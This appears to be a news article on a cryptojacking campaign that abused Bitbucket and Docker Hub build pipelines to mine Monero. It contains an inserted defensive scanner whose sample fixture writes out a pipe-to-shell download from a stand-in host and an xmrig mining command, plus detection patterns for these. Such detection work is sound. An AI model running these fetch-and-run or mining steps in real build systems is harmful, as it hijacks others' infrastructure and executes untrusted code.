According to researchers, these developer resources were also targeted last year for Monero mining, but now "the campaign has resurfaced with vengeance."
In September 2020, Aqua Security’s Team Nautilus discovered a campaign that targeted GitHub and Docker Hub automated build processes for cryptocurrency mining. At the time, the company notified the services, and the attack was blocked.
According to Aqua's latest report, the same campaign has resurfaced, and this time it is far more intense. Using Aqua Dynamic Threat Analysis (DTA), the researchers found that within just four days the attackers had set up around 92 malicious Bitbucket repositories and 92 malicious Docker Hub registries. The purpose of these resources is to mine cryptocurrency on the hosting services' build infrastructure.
Unique Integration Process
According to Aqua Security's lead data analyst Assaf Morag, the threat actors set up a continuous integration process. What makes it unusual is that it triggers multiple automated builds every hour, and each build runs a Monero crypto miner instead of compiling a project.
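The abuse described above lives entirely inside files a hosting service will happily build: a Dockerfile or pipeline definition whose "build" fetches and runs a miner. The following scanner is an added example, not code from the article or from Aqua's DTA; it walks a repository's build files and flags lines that carry miner indicators. The indicator list (mining pool `stratum+tcp://` URLs, well-known miner binary names, a Monero-shaped wallet address, `curl | sh` downloads, miner tuning flags) and the sample repositories it scans are constructed for this example and are assumptions about what such a build step looks like, not indicators published in the report.

```python
import re

# Indicators of a build step that runs a CPU miner. These patterns are this
# example's own assumptions, not IoCs from the Aqua report.
INDICATORS = [
    ("pipe download to shell", re.compile(r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b", re.I)),
    ("mining pool URL", re.compile(r"stratum\+(tcp|ssl)://", re.I)),
    ("known miner binary", re.compile(r"\b(xmrig|xmr-stak|minerd|cpuminer)\b", re.I)),
    # Standard Monero address: 95 base58 chars starting with '4'.
    ("Monero wallet address", re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")),
    ("miner tuning flag", re.compile(r"--(threads|cpu-max-threads-hint|donate-level)\b", re.I)),
]

BUILD_FILE_SUFFIXES = (".yml", ".yaml", ".sh")


def scan_build_file(path, text):
    """Return (path, line_no, indicator, line) for every indicator hit in one file."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments never trigger
        for label, rx in INDICATORS:
            if rx.search(line):
                hits.append((path, no, label, stripped))
    return hits


def scan_repo(files):
    """files: dict of path -> content. Only Dockerfiles, CI YAML and shell scripts are scanned."""
    hits = []
    for path, text in files.items():
        base = path.rsplit("/", 1)[-1]
        if base == "Dockerfile" or base.endswith(BUILD_FILE_SUFFIXES):
            hits.extend(scan_build_file(path, text))
    return hits


def is_suspicious(hits, min_indicators=2):
    """Flag a repo only when two or more distinct indicator types fire;
    a lone 'curl | sh' is common in legitimate Dockerfiles."""
    return len({label for _, _, label, _ in hits}) >= min_indicators


# Synthetic, valid-shaped Monero address (not a real wallet).
FAKE_WALLET = "4A" + "B" * 93

# Constructed sample repository mimicking the abuse: the build never compiles
# anything, it just fetches and runs a miner. Not a real repository.
SAMPLE_REPO = {
    "Dockerfile": "\n".join([
        "FROM alpine:3.13",
        "RUN apk add --no-cache curl",
        "# the 'build' step fetches and runs a miner",
        "RUN curl -sL http://example.invalid/setup.sh | sh",
        "RUN ./xmrig -o stratum+tcp://pool.example.invalid:3333 -u "
        + FAKE_WALLET + " --donate-level=1",
    ]),
    "bitbucket-pipelines.yml": "\n".join([
        "pipelines:",
        "  default:",
        "    - step:",
        "        script:",
        "          - docker build -t build-test .",
    ]),
    "README.md": "Official-looking documentation copied from a real project.\n",
}

# Constructed benign repository for comparison.
CLEAN_REPO = {
    "Dockerfile": "FROM golang:1.16\nCOPY . /src\nRUN cd /src && go build ./...\n",
}


if __name__ == "__main__":
    for name, repo in (("sample", SAMPLE_REPO), ("clean", CLEAN_REPO)):
        hits = scan_repo(repo)
        print(f"{name}: suspicious={is_suspicious(hits)}")
        for path, no, label, line in hits:
            print(f"  {path}:{no} [{label}] {line}")
```

Run as-is it prints the hits for the constructed repository (the pipe-to-shell line and the four indicators on the miner line) and reports the clean one as not suspicious. In practice this belongs in a pre-build hook or a periodic audit of automated-build sources, and the indicator list should be tuned to the build system in use; a scheduled hourly build that runs a single long-lived binary is the behavioural signal to pair it with.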
Straightforward Kill Chain
In this crypto mining campaign, the threat actors used a straightforward kill chain. First, they registered multiple fake email addresses with a Russian provider and then set up a Bitbucket account with numerous repositories, filling them with official-looking documentation so that they appear legitimate.